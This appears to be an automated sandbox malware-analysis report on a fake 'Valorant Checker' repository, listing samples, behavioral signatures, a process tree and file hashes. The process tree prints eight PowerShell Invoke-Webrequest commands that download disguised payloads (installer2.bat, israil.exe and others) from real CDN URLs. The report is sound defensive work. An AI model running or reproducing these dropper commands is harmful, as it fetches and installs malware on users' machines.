Overview
overview
10Static
static
3Valorant-C...er.exe
windows11-21h2-x64
7Valorant-C...ker.py
windows11-21h2-x64
3Valorant-C...le.exe
windows11-21h2-x64
8Valorant-C...up.bat
windows11-21h2-x64
1Valorant-C...CSS.py
windows11-21h2-x64
3Valorant-C...uth.py
windows11-21h2-x64
3Valorant-C...bot.py
windows11-21h2-x64
3Valorant-C...eck.py
windows11-21h2-x64
3Valorant-C...ker.py
windows11-21h2-x64
3Valorant-C...ers.py
windows11-21h2-x64
3Valorant-C...ata.py
windows11-21h2-x64
3Valorant-C...eck.py
windows11-21h2-x64
3Valorant-C...ll.bat
windows11-21h2-x64
1Valorant-C...ain.py
windows11-21h2-x64
3Valorant-C...inn.py
windows11-21h2-x64
3Valorant-C...es.exe
windows11-21h2-x64
8Valorant-C...uff.py
windows11-21h2-x64
3Valorant-C...ems.py
windows11-21h2-x64
3Valorant-C...trs.py
windows11-21h2-x64
3Valorant-C...ort.py
windows11-21h2-x64
3Valorant-C...ul.cmd
windows11-21h2-x64
8Valorant-C...rt.bat
windows11-21h2-x64
1Valorant-C...er.bat
windows11-21h2-x64
10Valorant-C...mpy.py
windows11-21h2-x64
3Valorant-C...sw.exe
windows11-21h2-x64
7Valorant-C.../sw.py
windows11-21h2-x64
3Valorant-C...cmp.py
windows11-21h2-x64
3Analysis
-
max time kernel
149s -
max time network
160s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-02-2024 11:30
Behavioral task
behavioral1
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checker.exe
Resource
win11-20240221-en
Behavioral task
behavioral2
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checker.py
Resource
win11-20240221-en
Behavioral task
behavioral3
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/checkmodule.exe
Resource
win11-20240221-en
Behavioral task
behavioral4
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/chsetup.bat
Resource
win11-20240221-en
Behavioral task
behavioral5
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/PCSS.py
Resource
win11-20240221-en
Behavioral task
behavioral6
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/auth.py
Resource
win11-20240221-en
Behavioral task
behavioral7
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/bot.py
Resource
win11-20240221-en
Behavioral task
behavioral8
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/check.py
Resource
win11-20240221-en
Behavioral task
behavioral9
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/checker.py
Resource
win11-20240221-en
Behavioral task
behavioral10
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/checkers.py
Resource
win11-20240221-en
Behavioral task
behavioral11
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/data.py
Resource
win11-20240221-en
Behavioral task
behavioral12
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/fastcheck.py
Resource
win11-20240221-en
Behavioral task
behavioral13
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/install.bat
Resource
win11-20240221-en
Behavioral task
behavioral14
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/main.py
Resource
win11-20240221-en
Behavioral task
behavioral15
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/mainn.py
Resource
win11-20240221-en
Behavioral task
behavioral16
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/resources.exe
Resource
win11-20240221-en
Behavioral task
behavioral17
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/stuff.py
Resource
win11-20240221-en
Behavioral task
behavioral18
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/systems.py
Resource
win11-20240221-en
Behavioral task
behavioral19
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/trs.py
Resource
win11-20240221-en
Behavioral task
behavioral20
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/py/validsort.py
Resource
win11-20240221-en
Behavioral task
behavioral21
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/smmmodul.cmd
Resource
win11-20240221-en
Behavioral task
behavioral22
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/start.bat
Resource
win11-20240221-en
Behavioral task
behavioral23
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/updater.bat
Resource
win11-20240221-en
Behavioral task
behavioral24
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/vacwcbmpy.py
Resource
win11-20240221-en
Behavioral task
behavioral25
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/valorchksw/sw.exe
Resource
win11-20240221-en
Behavioral task
behavioral26
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/valorchksw/sw.py
Resource
win11-20240221-en
Behavioral task
behavioral27
Sample
Valorant-Checker-Fast-Api-main/Valorant Checker/vcmp.py
Resource
win11-20240221-en
General
-
Target
Valorant-Checker-Fast-Api-main/Valorant Checker/checkmodule.exe
-
Size
5KB
-
MD5
8406f2837a1c88913823bd0f56388823
-
SHA1
2eff05727b75e51e6566a455e12596da1da5442a
-
SHA256
a46d49755e6542c1562896a727282d9585ead892b0ce86f5a33af58e8a1184f4
-
SHA512
c55fa01ea716aa26ab40ff5ee6245be65c31b5f0427d3063f8cf79c50d92a3540a7fd579130f86e16e8f92215535c75b90b1a1e80ecc0287419395dbc566c326
-
SSDEEP
96:gurZY1HUoCiGs5bVk4Cgqrwhjw+grMkSzNt:pri6E5BkQqclbgrFU
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 13 3432 powershell.exe 14 2864 powershell.exe 15 580 powershell.exe 16 2196 powershell.exe 17 1028 powershell.exe 18 4228 powershell.exe 19 1044 powershell.exe 22 1868 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
pid Process 984 timeout.exe 2700 timeout.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3432 powershell.exe 3432 powershell.exe 2864 powershell.exe 2864 powershell.exe 580 powershell.exe 580 powershell.exe 2196 powershell.exe 2196 powershell.exe 1028 powershell.exe 1028 powershell.exe 4228 powershell.exe 4228 powershell.exe 1044 powershell.exe 1044 powershell.exe 1868 powershell.exe 1868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 332 wrote to memory of 2504 332 checkmodule.exe 82 PID 332 wrote to memory of 2504 332 checkmodule.exe 82 PID 332 wrote to memory of 2504 332 checkmodule.exe 82 PID 2504 wrote to memory of 5012 2504 cmd.exe 83 PID 2504 wrote to memory of 5012 2504 cmd.exe 83 PID 2504 wrote to memory of 5012 2504 cmd.exe 83 PID 5012 wrote to memory of 3532 5012 resources.exe 86 PID 5012 wrote to memory of 3532 5012 resources.exe 86 PID 5012 wrote to memory of 3532 5012 resources.exe 86 PID 3532 wrote to memory of 3432 3532 cmd.exe 88 PID 3532 wrote to memory of 3432 3532 cmd.exe 88 PID 3532 wrote to memory of 3432 3532 cmd.exe 88 PID 3532 wrote to memory of 2864 3532 cmd.exe 89 PID 3532 wrote to memory of 2864 3532 cmd.exe 89 PID 3532 wrote to memory of 2864 3532 cmd.exe 89 PID 3532 wrote to memory of 580 3532 cmd.exe 90 PID 3532 wrote to memory of 580 3532 cmd.exe 90 PID 3532 wrote to memory of 580 3532 cmd.exe 90 PID 3532 wrote to memory of 2196 3532 cmd.exe 91 PID 3532 wrote to memory of 2196 3532 cmd.exe 91 PID 3532 wrote to memory of 2196 3532 cmd.exe 91 PID 3532 wrote to memory of 1028 3532 cmd.exe 92 PID 3532 wrote to memory of 1028 3532 cmd.exe 92 PID 3532 wrote to memory of 1028 3532 cmd.exe 92 PID 3532 wrote to memory of 4228 3532 cmd.exe 93 PID 3532 wrote to memory of 4228 3532 cmd.exe 93 PID 3532 wrote to memory of 4228 3532 cmd.exe 93 PID 3532 wrote to memory of 2700 3532 cmd.exe 94 PID 3532 wrote to memory of 2700 3532 cmd.exe 94 PID 3532 wrote to memory of 2700 3532 cmd.exe 94 PID 3532 wrote to memory of 1044 3532 cmd.exe 95 PID 3532 wrote to memory of 1044 3532 cmd.exe 95 PID 3532 wrote to memory of 1044 3532 cmd.exe 95 PID 3532 wrote to memory of 984 3532 cmd.exe 97 PID 3532 wrote to memory of 984 3532 cmd.exe 97 PID 3532 wrote to memory of 984 3532 cmd.exe 97 PID 3532 wrote to memory of 1868 3532 cmd.exe 98 PID 3532 wrote to memory of 1868 3532 cmd.exe 98 PID 3532 wrote to memory of 1868 3532 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\checkmodule.exe"C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\checkmodule.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""smmmodul.cmd""2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\5bdda59b-610e-4cf2-aa73-ec1509fe8c3b.bat4⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- Delays execution with timeout.exe
PID:2700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 85⤵
- Delays execution with timeout.exe
PID:984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0636f2d138baca01dbb2eedb99bf3d5
SHA13b927899db0f3e2cb510782592887dc02fc3e400
SHA25610973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA5120187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d
-
Filesize
18KB
MD5f73eb5ad3edc691b96c957270952ae23
SHA153e8974b4f079ab124cd8e86c97c3638fab65505
SHA256c837f5ab086c5cf22f6fe7695a057f2be01260eb12c8f2123816257a7acb4ff3
SHA512fa4fb0f6885d9e7f0548bc9f152042bc70b90b87f0b104c2eb8ca0d4658333a2dc36d14b91938074d3bf784dbfce9a731e9d1c9e0fd3f9d761fe258f1ed68ecd
-
Filesize
18KB
MD545b390050e5f56bace37e5db3756c327
SHA14bd0a51cf39d9dbba616bab8b5f895f431ab1c92
SHA25608ee12de170a33af672bc738104d30063000daa7df0e1c39b9a36549df357720
SHA512ddc9bc7d933416aabcdca229acfa96539ee916d5a745679f0270c949641ee813ca7ee8ad06b20b1147e4433a76eadc84808dc90d9ee24aa02510e0ea0178f9c5
-
Filesize
18KB
MD526f9a4f01b23cb1f3012be7c2f6b1965
SHA1316e27e96025f9d77d607557dd1094063beffbc9
SHA256a67df61aec3d8730372b54db00bbfccdc4128e298e122198a1e4fa03a5afd766
SHA5125e6e4a66fea8e25868d84414983510b96f2f68d3ca6abc8b08a02423cb72e956c9585a5ff156533d541ba525f58a213bf3b69d32e43f43669e26fdae05b7c559
-
Filesize
18KB
MD561a5055b0f266b3e0d713887544f4d25
SHA1e5ef05880b51d0a16a6e99f7c7e03536766e2edd
SHA25658222bdd3c6ca2a4192ce68ccd61064445b6d62cffc94adab057e2d4c004a545
SHA512268b0cb32c5352a5ec08b1013e2fc5494c9b8def6c784c82e2e61d75e267dea254a0d881c04c5db17964a7c312c7deb86c37e9380c65cdab6207d43575e39c45
-
Filesize
18KB
MD5f26d00144f846fd1912d6c1b3db14ebb
SHA1c022fd2ab01770e20b4657bf6a8a21fdabbde186
SHA256feac54661124c14c3a52be43ba02aaebd48ffd0b62a623cc13d46c423db2e4cd
SHA512fd699872c19e186e6cd56805c504730c90d6a833899194e37892f2de7a130cabc102bd1a21f6c2bd56f6e29c9c2598540dbd77b32a48fcff91e0a4e09509f8b8
-
Filesize
18KB
MD58c20d753391775c9b81e80115d331ed8
SHA1ee45f705b3c660a8502a88a919d4f9b5c5fe9134
SHA25633595c77bb9125d3f6044f351416e6de53888f0f8a6bf9307b5af01e07d8478b
SHA512b174597d8bc6c52668358f3407a5343cbab3a659203d8b8d7940254d5cfe40fd7770da9ccf74d592c2fe5569caf32da51cc4f3d12ae330b551e3afdd583b8609
-
Filesize
18KB
MD535084db10aa0a75913f68aa015a03210
SHA193256175e7273f562414faa58243157a7fb7cea5
SHA2565680206451c6b410385a973a14458a22779300dc8203effd7787b9b7a51c56aa
SHA512a11c8ac5aaa62841f94483c6f9cdf9dc256844211b8bcef2d58ec5cb742bf56b92d1d518534619f8ce1f474f13128a272f3f3401e0aee570e9d2b110979a7c5f
-
Filesize
1KB
MD5d0cec99ca3a717c587689ebf399662c4
SHA11d4bbaf8079912ada46a6fa8693d8c20d5ec5b66
SHA256b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228
SHA51299b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82